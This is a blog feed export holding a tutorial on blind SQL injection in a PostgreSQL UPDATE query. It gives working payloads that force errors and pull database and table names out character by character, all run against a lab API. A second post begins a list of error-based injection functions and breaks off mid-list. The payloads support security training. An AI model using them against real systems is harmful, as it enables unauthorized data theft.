tag:blogger.com,1999:blog-68932387046540672082024-03-18T09:59:17.768+05:30Start With Linux | Mannu Linuxcyb3r.gladiat0rhttp://www.blogger.com/profile/05122125366641803109noreply@blogger.comBlogger106125tag:blogger.com,1999:blog-6893238704654067208.post-67647323575089787422024-03-18T09:49:00.007+05:302024-03-18T09:58:44.390+05:30Blind SQL Injection in update query for OSWE - PostgreSQL Database <p><span style="font-family: "Expletus Sans";">Pranaam to all <span style="font-size: x-large;">🙏</span></span></p><p><span style="font-family: Expletus Sans;">In this blog post we are gonna explore the approach to exploit an SQL Injection in update query. </span></p><p><span style="font-family: Expletus Sans;">Following are the assumptions:</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Injection point - Where clause in Update query. </span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Use of stack query is not allowed.</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> The web application is not showing DB error message.</span></p><p><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> Blind injection is possible</span></p><p><span style="font-family: Expletus Sans;">Just one meme before proceeding to the explanation<span style="font-size: large;"> 😅</span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizE4w2o8fRI1XHPKIsNJuruU2y79aoUiBY_F8wLZvF-gjuYcqIzEqQU611PGfevhR567hwf36CRC5gGrX-K8QfJD99uGnUb9bo-6FvynX3FxqF4Ca61pCidx7YuMj5i2dl908ZAeZRCBFH91mHbMJJ5VwPju5mlme4_rlYd6NdLwaGOFu5XZw_58NCsdY/s1280/one.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizE4w2o8fRI1XHPKIsNJuruU2y79aoUiBY_F8wLZvF-gjuYcqIzEqQU611PGfevhR567hwf36CRC5gGrX-K8QfJD99uGnUb9bo-6FvynX3FxqF4Ca61pCidx7YuMj5i2dl908ZAeZRCBFH91mHbMJJ5VwPju5mlme4_rlYd6NdLwaGOFu5XZw_58NCsdY/s16000/one.png" /></a></div><br /><p><br /></p><p><span style="color: #fcff01; font-family: verdana; font-size: large;"><u style="background-color: black;">Update Query injection - Integer based </u></span></p><p><span style="font-family: Expletus Sans;">The vulnerable SQL query is as follow:</span></p>
<pre><textarea cols="20" rows="2" style="height: 27px; width: 505px;"> UPDATE indishell_admins SET active=1 WHERE id= User_Supplied_Data</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkO67ExEcayFOAZkHljcyx8j1VLrIievGCRon4g-BuUn7KkO-mxvhgiZ48ONnCJGn2h6BmQmIyhbm6PoAccv0AJOKhtVJsehCyNM3WfYfWv80lDVrJ_BfaSRarhifDYePp96dOxAr_GkJwqrY7EcUJeUzUQqpb23gl5jpaHzUA9KxXipDBylau2oTC3A/s1244/u1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="1244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkkO67ExEcayFOAZkHljcyx8j1VLrIievGCRon4g-BuUn7KkO-mxvhgiZ48ONnCJGn2h6BmQmIyhbm6PoAccv0AJOKhtVJsehCyNM3WfYfWv80lDVrJ_BfaSRarhifDYePp96dOxAr_GkJwqrY7EcUJeUzUQqpb23gl5jpaHzUA9KxXipDBylau2oTC3A/s16000/u1.png" /></a></div><span style="font-family: Expletus Sans;">Upon successful execution of Update query, API responds with success message. </span><div><span style="font-family: Expletus Sans;">If something goes wrong, response is something like this:</span></div><div><span style="font-family: "Expletus Sans";"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjggkxRtGlcJ9EoCtup_dLa5nBYMYKSQWVVRf7V6FJc0r8wwhVwfpO_3aFENt0Fml4JCmgaqs3165uhvQb_SK00HuJDnCa5KKr-792cEuKaB0h2GZEiYcK5668HrCIRPflQrIgg9yMrsx2Cx0KLN9wUhMEU1K-ghNwWAQU6ff7ARNo1gfYUCs4dxA_N-Q/s1296/u2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="1296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjggkxRtGlcJ9EoCtup_dLa5nBYMYKSQWVVRf7V6FJc0r8wwhVwfpO_3aFENt0Fml4JCmgaqs3165uhvQb_SK00HuJDnCa5KKr-792cEuKaB0h2GZEiYcK5668HrCIRPflQrIgg9yMrsx2Cx0KLN9wUhMEU1K-ghNwWAQU6ff7ARNo1gfYUCs4dxA_N-Q/s16000/u2.png" /></a></div><br /><span><span style="background-color: black;"><b><span style="color: #fcff01;"><u><span style="font-size: large;">How to solve this puzzle</span></u><span style="font-size: medium;"> </span></span></b></span></span></span></div><div><span style="font-family: "Expletus Sans";"><br /></span></div><div><span style="font-family: Expletus Sans;">To exploit such SQL injection vulnerable endpoint, we are going to use following type of payload:</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;"><pre><textarea cols="20" rows="2" style="height: 47px; width: 605px;"> (select 1 from user where data_extraction_payload+comparison or
Payload_which_cause_an_SQL_Server_execption_or_return_multiple_rows)</textarea></pre></span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="color: #fcff01; font-family: Expletus Sans;"><b style="background-color: black;">Why this approach:</b></span></div><div><span style="color: #fcff01; font-family: Expletus Sans;"><b><br /></b></span></div><div><span style="font-family: Expletus Sans;">Well, when we are performing Blind SQL Injection exploitation:</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;"><span style="font-size: large;">👉</span> If condition/comparison specified by us is correct, it allows SQL query to perform update operation and user see a generic "success" message</span></div><div><span style="font-family: Expletus Sans;">else </span></div><div><span style="font-family: Expletus Sans;"><span style="font-size: x-large;">👉</span> force SQL query to execute the payload which causes an error and hence no update operation is performed. When update query encounters an error, web API code shows a generic error message.</span></div><div><span style="font-family: Expletus Sans;"><br /></span></div><div><span style="font-family: Expletus Sans;">Here is our sample payload: </span></div><div><span style="font-family: Expletus Sans;"><pre><textarea cols="20" rows="2" style="height: 31px; width: 570px;">(select 1 from user where 1=1 or has_database_privilege(1337,'b0x'))</textarea></pre></span></div><div><pre><br /></pre><pre><span style="font-family: Expletus Sans;">Let's breakdown the payload to understand it's different parts.</span></pre><pre><span style="font-family: "Expletus Sans"; font-size: x-large;">👉</span> Data extraction/Comparison part of the payload: </pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 205px;">where something=something </textarea></span></pre><pre><span style="font-family: Expletus Sans;">To perform blind SQL Injection exploitation, we need to perform comparison using this part. </span></pre><pre><span style="font-family: Expletus Sans;">If comparison returns true, in that case web API will return "Success" message.</span></pre><pre><span style="font-family: "Expletus Sans"; font-size: x-large;">👉</span> <span style="font-family: Expletus Sans;">Exception causing part: </span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 305px;">OR has_database_privilege(1337,'b0x')</textarea></span></pre><pre><span style="font-family: Expletus Sans;">This part of payload will come into action when the condition specified in Data extraction/comparison part does not return true. </span></pre><pre><span style="font-family: Expletus Sans;">This payload will always cause an exception due to the fact that the second argument to function <span style="color: #ffa400;">has_database_privilege()</span> needs a valid DB privilege name whereas we have specified sting 'b0x' which is not a valid DB privilege name.</span></pre><pre><span style="font-family: Expletus Sans;"><br /></span></pre><pre><span style="font-family: Expletus Sans;"><span style="background-color: black; white-space: normal;"><b style="font-size: x-large;"><span style="color: #fcff01;"><u>Exploitation time</u> </span></b><span style="font-size: x-large;">🤘</span></span><span style="font-size: x-large; white-space: normal;">😎🤘</span></span></pre><pre><span style="font-family: Expletus Sans;">First of all, let's verify if our payload is working as expected or not:</span></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">True condition:</span></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT-d4EUCX9wB0tiLrhecRT_XigBmCokLp2s9s3X8C3DdxxAzMgOb6B4TpdcsJn0KEzyjSXQPC2VezcluEfn9d8nkWDS5OqeXIW_hoeS4BgQNe2JbzSv_ExPvelHZI45eOwIYImilNkVeXJYnfc0ZeTN4Lqs_KMdnGAU1NOMW2_B97hgEn6EYSyfCi72Tk/s1416/u3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="483" data-original-width="1416" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT-d4EUCX9wB0tiLrhecRT_XigBmCokLp2s9s3X8C3DdxxAzMgOb6B4TpdcsJn0KEzyjSXQPC2VezcluEfn9d8nkWDS5OqeXIW_hoeS4BgQNe2JbzSv_ExPvelHZI45eOwIYImilNkVeXJYnfc0ZeTN4Lqs_KMdnGAU1NOMW2_B97hgEn6EYSyfCi72Tk/s16000/u3.png" /></a></div><pre><br /></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">False condition:</span></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw_1hFZDTrJhtTXxdapFcUMLRJUK-IkaSLjDRKgwxYFdgxLvywQLoND299GSzHyeyvXQaxpKCXqAVFjA3TPw-HjWOB0gk1fRPtP9i_4hlbcdOoSdI4B3jGL-WL3iS0VnnMwPTrw8LVp8uEvY01hSniquh4BYnn_Jpb_EP9XQeV393RWJxsj19aBwz9wM/s1409/u4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="482" data-original-width="1409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNw_1hFZDTrJhtTXxdapFcUMLRJUK-IkaSLjDRKgwxYFdgxLvywQLoND299GSzHyeyvXQaxpKCXqAVFjA3TPw-HjWOB0gk1fRPtP9i_4hlbcdOoSdI4B3jGL-WL3iS0VnnMwPTrw8LVp8uEvY01hSniquh4BYnn_Jpb_EP9XQeV393RWJxsj19aBwz9wM/s16000/u4.png" /></a></div><br /><pre><span style="color: #ffa400; font-family: Expletus Sans;">Extracting the database name</span></pre><pre><span style="font-family: Expletus Sans;">The below mentioned payload will extract first character from the database name and will convert int into ASCII value</span></pre><pre><textarea cols="20" rows="2" style="height: 27px; width: 305px;">ascii(substring(current_database(),1,1))</textarea></pre><pre><span style="font-family: Expletus Sans;">Now, put it into our payload and start comparing it. Final payload will be like this:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 500px;">(select 1 from user
where some_ASCII_value < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea></pre><pre><span style="font-family: Expletus Sans;">The name of current database is "box" and the ASCII value of first character of the Database name is 98 (b).</span></pre><pre><span style="font-family: Expletus Sans;">Let's ask to DB if the ASCII value is greater then 90 or not using below mentioned payload:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 90 < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea><br /></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5YcGBU8rxpGV3VHYuZl2fwI5R1nif28X2IeWWPZqdt738BFM5hDekyOtodpl0OVn22y4BuNZ3ABkD0NpTqtjYx78Whay5OiYVEAL1HvblxqahVmVRMcjt-8LF0HdaZyPebIeq7lrKbueTjVc9QiLNoU_lNu-gNgpzizEJ7V6D1kwD8-epnlcZm2bhSQ/s1310/u5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="404" data-original-width="1310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhr5YcGBU8rxpGV3VHYuZl2fwI5R1nif28X2IeWWPZqdt738BFM5hDekyOtodpl0OVn22y4BuNZ3ABkD0NpTqtjYx78Whay5OiYVEAL1HvblxqahVmVRMcjt-8LF0HdaZyPebIeq7lrKbueTjVc9QiLNoU_lNu-gNgpzizEJ7V6D1kwD8-epnlcZm2bhSQ/s16000/u5.png" /></a></div><br /><pre><span style="font-family: Expletus Sans;">The web API response shows that the condition evaluated successfully which means the ASCII value of first character of DB name is greater then 90.</span></pre><pre><span style="font-family: Expletus Sans;">Let's check if ASCII value 100 is greater then the ASCII value of first character of the Database name using below mentioned payload:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 100 < ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea><br /></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_h_J3PLbbH0GV79aBRn_Fun8CWL9GEgWq5sdWyH4Ut4cJTBytL4ZYvsw0DCc6Q6R5sn4LyepJwnI8t0ulT0u5apcZ8w7OMcU-dxx2zDe6qg2qGS0n5AIymr9dHBvpwzq04vM1P4x82VqAjtLBqBWEqr4QerbEIOzYB6SLWqKw9eRC8QPdcCAbQfbSoM/s1312/u6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="468" data-original-width="1312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjq_h_J3PLbbH0GV79aBRn_Fun8CWL9GEgWq5sdWyH4Ut4cJTBytL4ZYvsw0DCc6Q6R5sn4LyepJwnI8t0ulT0u5apcZ8w7OMcU-dxx2zDe6qg2qGS0n5AIymr9dHBvpwzq04vM1P4x82VqAjtLBqBWEqr4QerbEIOzYB6SLWqKw9eRC8QPdcCAbQfbSoM/s16000/u6.png" /></a></div><br /><pre><span style="font-family: Expletus Sans;">No, API response shows that the update query could not perform operation. Because ASCII value of database name first character is 98 which is not greater then 100 and condition specified in OR operator i.e. has_database_privilege(1337,'b0x') evaluated and caused an exception. </span></pre><pre><span style="font-family: Expletus Sans;">Now, instead of performing less/greater then operator, try with equal operator and mention 98 and see the API response if we are going in right direction. Use below mentioned payload:</span></pre><pre><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 98 = ascii(substring(current_database(),1,1))
or has_database_privilege(1337,'b0x'))</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKIcDwsPMN2U-EoIggxiRPFE4bchW4TE-h3p2MSrJP94mT77PPEcXhrD-nglz83pl_5IFEa_25y8x_jhn4o5xxSlPUJtGlH7YhzX9oXZD21mLv6e9sRc7Pdpir1LBTLGbPWAOIIcm3PTYOYn8QdNF73ijvK8qL7Pjm5zHApthDrf1-QX6YLN_RC-BPoo/s1284/u7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="1284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKIcDwsPMN2U-EoIggxiRPFE4bchW4TE-h3p2MSrJP94mT77PPEcXhrD-nglz83pl_5IFEa_25y8x_jhn4o5xxSlPUJtGlH7YhzX9oXZD21mLv6e9sRc7Pdpir1LBTLGbPWAOIIcm3PTYOYn8QdNF73ijvK8qL7Pjm5zHApthDrf1-QX6YLN_RC-BPoo/s16000/u7.png" /></a></div><pre><span style="font-family: Expletus Sans;">To extract the ASCII value of next character, we need to make a small change in payload i.e. we need to increment the value of substring() second argument by one.</span></pre><pre><span style="font-family: Expletus Sans;">Means, we need to change it from </span></pre><pre><span style="font-family: Expletus Sans;"><span style="color: #ffa400;">ascii(substring(current_database(),</span><b><span style="color: white;">1</span></b><span style="color: #ffa400;">,1))</span> </span></pre><pre><span style="font-family: Expletus Sans;">to </span></pre><pre><span style="font-family: Expletus Sans;"><span style="color: #ffa400;">ascii(substring(current_database(),</span><b><span style="color: white;">2</span></b><span style="color: #ffa400;">,1)) </span></span></pre><pre><span style="font-family: Expletus Sans;">And payload will be like this:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 65px; width: 400px;"> (select 1 from user
where 98 = ascii(substring(current_database(),2,1))
or has_database_privilege(1337,'b0x'))</textarea></span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFBEkTGQj8ARSZccxIPoWm18qSufAB_e4EO-NVheXQCf2ldzi8_rIbAgfX87KTdhU2MEdQtTK6YEJCEtPqPS02yMNYXDvwLYAaG-7OP1c2wOwhiyAfwWhyphenhyphenxh9AHU6k_x7wqcRQ-Ux4-bcJzXAtmnvWco0Tm0CNgdlmgKOqu2YJSc9OuRh1GadoM3kbhw/s1133/u8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="1133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFBEkTGQj8ARSZccxIPoWm18qSufAB_e4EO-NVheXQCf2ldzi8_rIbAgfX87KTdhU2MEdQtTK6YEJCEtPqPS02yMNYXDvwLYAaG-7OP1c2wOwhiyAfwWhyphenhyphenxh9AHU6k_x7wqcRQ-Ux4-bcJzXAtmnvWco0Tm0CNgdlmgKOqu2YJSc9OuRh1GadoM3kbhw/s16000/u8.png" /></a></div><br /><span style="font-family: Expletus Sans;">There we go!</span></pre><pre><span style="font-family: Expletus Sans;">Now, to extract the value of second character, we need to repeat the same process which we followed to figure out the first character</span></pre><pre><span style="font-family: Expletus Sans;"><pre><span style="color: #ffa400; font-family: Expletus Sans;">Extracting tables name for current DB</span></pre></span></pre><pre><span style="font-family: Expletus Sans;">To extract the tables name, we need to consider following things:</span></pre><pre><span style="font-family: Expletus Sans;">Step 1<span style="font-size: large;">👉</span> Run SQL query which extract name of only one table at a time. Let's say name of first table. </span></pre><pre><span style="font-family: Expletus Sans;">Step 2<span style="font-size: large;">👉</span> After extraction of table name, get the first character using substring( )</span></pre><pre><span style="font-family: Expletus Sans;">Step 3<span style="font-size: large;">👉</span> Convert that extracted character into ASCII value</span></pre><pre><span style="font-family: Expletus Sans;">Step 4<span style="font-size: large;">👉</span> Perform comparison against ASCII values to figure out the ASCII value of first char </span></pre><pre><span style="font-family: Expletus Sans;">Step 5<span style="font-size: large;">👉</span> Once we get to know the first character, go to step 2 and change the value in substring( ) to extract the next character</span></pre><pre><span style="font-family: Expletus Sans;">Step 6<span style="font-size: large;">👉</span> Follow step 3 and 4 to figure out the second character.</span></pre><pre><span style="font-family: Expletus Sans;">Step 7<span style="font-size: large;">👉</span> To extract next table name, go to step 1 and change the value of offset from 0 to 1.</span></pre><pre><span style="font-family: Expletus Sans;">Step 8<span style="font-size: large;">👉</span> Follow step 2 to step 6 to find out the name of second table.</span></pre><pre><span style="font-family: Expletus Sans;"><br /></span></pre><pre><span style="color: #fcff01; font-family: Expletus Sans;">Payload to extract the name of first table from information schema:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 526px;"> select table_name from information_schema.tables limit 1 offset 0</textarea></span></pre><pre><span style="font-family: Expletus Sans;">If we want go for another table, make a change in the value of offset. </span></pre><pre><span style="font-family: Expletus Sans;">For example, </span></pre><pre><span style="font-family: Expletus Sans;">for second table it will become offset 1</span></pre><pre><span style="font-family: Expletus Sans;">In case of third table, it will become offset 2</span></pre><pre><span style="font-family: Expletus Sans;">When we go for forth table, make it offset 3 </span></pre><pre><span style="font-family: Expletus Sans;">and so on....</span></pre><pre><span style="font-family: Expletus Sans;">To extract a character and conversion of it will be done using substring( ) and ASCII( ) respectively.</span></pre><pre><span style="font-family: Expletus Sans;">Our final payload will look something like this:</span></pre><pre><span style="font-family: Expletus Sans;"> <textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,1,1)) from information_schema.tables limit 1 offset 0)
or has_database_privilege(1337,'b0x'))</textarea></span></pre><pre><span style="font-family: Expletus Sans;">First table name is admins and hence the ASCII value of it first character which will be extracted by the payload is 97 (a value greater then 90).</span></pre><pre><span style="font-family: Expletus Sans;">When request was sent to the API, following response confirmed our theory:</span></pre><pre><span style="font-family: Expletus Sans;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNZjIyZ3BmxmV9wEbGMhn5gvliPv3EzDHfYg_aM8NJ1k4HYoUtIBK36IexT5xrXyzH6ewXUn5KXNfkFPbeeK3o1l1F3IA1azItfVTLEbGKdBVzgjER6aC0z9j7iDXVfBQbq3_nXMr34Y-oXmMZt-W8kQ1DUheuHNe7QH-7X_4lfLtxc_bnSeMT1CJeuAY/s1188/u9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="1188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNZjIyZ3BmxmV9wEbGMhn5gvliPv3EzDHfYg_aM8NJ1k4HYoUtIBK36IexT5xrXyzH6ewXUn5KXNfkFPbeeK3o1l1F3IA1azItfVTLEbGKdBVzgjER6aC0z9j7iDXVfBQbq3_nXMr34Y-oXmMZt-W8kQ1DUheuHNe7QH-7X_4lfLtxc_bnSeMT1CJeuAY/s16000/u9.png" /></a></div>Let's try with ASCII value 100 and see the response:</span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKD1KMYeAPJ2Nqqx5JIw9n246_ulI4pIKNIz-BspkVK24AcG4jY52S_V7UwF2QO0KQ1mxEBJ0DNjlx4FcbQAGYmvgxVblcxc5lVNUz9e1spO2qiWrEF9BlGKAbzEP-iHto2lRkjSCD7Y5-7zAxNeNtbiVOMqPdrtDaRDwHV-MAuAzRRJEajKDIabxX7g/s1190/u10.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="395" data-original-width="1190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQKD1KMYeAPJ2Nqqx5JIw9n246_ulI4pIKNIz-BspkVK24AcG4jY52S_V7UwF2QO0KQ1mxEBJ0DNjlx4FcbQAGYmvgxVblcxc5lVNUz9e1spO2qiWrEF9BlGKAbzEP-iHto2lRkjSCD7Y5-7zAxNeNtbiVOMqPdrtDaRDwHV-MAuAzRRJEajKDIabxX7g/s16000/u10.png" /></a></div><br /><span style="font-family: Expletus Sans;">It's working!</span></pre><pre><span style="font-family: Expletus Sans;">Go for equal operator and see if it is working or not:</span></pre><pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQWWIj1bBMMvWF33RQzI3lQPoSBl8L2qBT1mBn_ZliMEC3JSEDc6GFdCmeP7sSmiI765Z5md5460MdHuB449jLxUaaPinkiN2qmeyg3ofqiLtZRMaZBCtR9jtT3vfQmNz6a1G3zXCL8wg-y5eDkU3RmafpMQov5MkI-kByrMweoRPlNcRtahDsRnBkdrI/s1189/u11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="1189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQWWIj1bBMMvWF33RQzI3lQPoSBl8L2qBT1mBn_ZliMEC3JSEDc6GFdCmeP7sSmiI765Z5md5460MdHuB449jLxUaaPinkiN2qmeyg3ofqiLtZRMaZBCtR9jtT3vfQmNz6a1G3zXCL8wg-y5eDkU3RmafpMQov5MkI-kByrMweoRPlNcRtahDsRnBkdrI/s16000/u11.png" /></a></div><br /><span style="font-family: Expletus Sans;">Done <span style="font-size: large;">😎</span>Now try to extract next character of the first table name.</span></pre><pre><span style="font-family: Expletus Sans;">Here, payload needs a modification in second argument of substring( ) i.e. substring(table_name,<span style="color: white;">1</span>,1) will become substring(table_name,<span style="color: white;">2</span>,1)<br />Payload to extract second character will be:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,2,1)) from information_schema.tables limit 1 offset 0)
or has_database_privilege(1337,'b0x'))</textarea> </span></pre><pre><span style="font-family: Expletus Sans;">In order to extract second character of the first table name, we need to repeat same steps which we followed to extract the first character.</span></pre><pre><span style="background-color: black; color: #fcff01; font-family: Expletus Sans;">Payload to extract the name of second table from information schema:</span></pre><pre><span style="font-family: Expletus Sans;">As I mentioned earlier, if we performing blind SQL Injection, we need to specify which table we want to extract. To do this, limit and offset will help us.</span></pre><pre><span style="font-family: Expletus Sans;">Sample payload which will extract the name of second table of current database:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 556px;"> select table_name from information_schema.tables limit 1 offset 1</textarea></span></pre><pre><span style="font-family: Expletus Sans;">To extract the name of third table, payload will be:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 27px; width: 556px;"> select table_name from information_schema.tables limit 1 offset 2 </textarea></span></pre><pre><span style="font-family: Expletus Sans;">As we are interested in extraction of first character of the second table name, we need to pass the table name to substring( ) and ASCII( ) to get it.</span></pre><pre><span style="font-family: Expletus Sans;">Payload will be like this:</span></pre><pre><span style="font-family: Expletus Sans;"><textarea cols="20" rows="2" style="height: 57px; width: 756px;"> (select 1 from user
where 90 < (select ascii(substring(table_name,1,1)) from information_schema.tables limit 1 offset 1)
or has_database_privilege(1337,'b0x'))</textarea><br /></span></pre><pre><span style="font-family: Expletus Sans;">Just keep changing ASCII value to perform the comparison and observe the API response.</span></pre><pre><span style="font-family: Expletus Sans;">For now, we are done and I will be back with some new stuff.
Thanks for your time.
With Love from </span></pre><pre><span style="font-family: Expletus Sans;"><span style="font-size: large;">❤️</span> --==[[ Indishell Lab ]]==-- </span><span style="font-size: large;">❤️</span></pre><pre><br /><span style="font-family: Expletus Sans;"></span></pre></div>
Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-20093162267969027132023-12-26T09:38:00.004+05:302023-12-28T17:44:30.360+05:30New payloads to exploit Error-based SQL injection - PostgreSQL database<p> <span>Pranaam to all </span><span style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">🙏</span></p><p><span>In <a href="https://www.mannulinux.org/2023/12/New-payload-to-exploit-Error-based-SQL-injection-Oracle-database.html" target="_blank"><span style="color: #fcff01;">previous blogpost </span></a> we explored a new payload to exploit error-based SQL injection in Oracle database. </span>Now let's go for PostgreSQL related stuff as initially I was working on it only.</p><p>Before proceeding, just one meme 😅 </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s1280/one.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s16000/one.png" /></a></div><p><br /></p><p><span style="color: #fcff01; font-size: large;"><b style="background-color: black;">Lab setup:</b></span></p><p><span> </span>👉 PHP </p><p><span> </span>👉 PostgreSQL Database</p><p><span> </span>👉 Apache web server</p><p>Sample vulnerable PHP code and database dump are available on my Github account:</p><p><a href="https://github.com/incredibleindishell/SQLI_b0x/tree/main/PostgreSQL"><span style="color: #f1c232;">https://github.com/incredibleindishell/SQLI_b0x/tree/main/PostgreSQL</span></a></p><p>In my case, I have vulnerable API with following scenarions:</p><p><span style="color: #ffa400; font-size: medium;"><u>Select statement:</u></span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Where clause</span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Like clause</span></p><p><span style="color: #fcff01; font-size: medium;"><span style="color: black; font-size: medium;"> </span><span style="color: black; font-size: medium;">👉 </span><span style="font-size: medium;">Order by</span><span style="color: #fcff01; font-size: medium;"> clause</span></span></p><p><span> </span><br /></p><p><b style="background-color: black; color: #fcff01; font-size: x-large;">Functions which are our friend 😍</b></p><p><span style="font-size: large;"><span style="color: #fcff01;"><b style="background-color: black;"></b></span></span></p><p>During the experiment phase, I found multiple database function which can be used to perform exploitation of error-based SQL Injection in case of PostgreSQL Database.</p><p>Here Goes the list:</p><p style="text-align: left;"></p><ol style="text-align: left;"><li><span style="color: #fcff01; font-family: Expletus Sans;">box</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">currval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">setval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">nextval</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">polygon</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">circle</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">path</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">point</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">lseg</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">pg_has_role</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">pg_get_viewdef</span></li><li><span style="color: #fcff01; font-family: Expletus 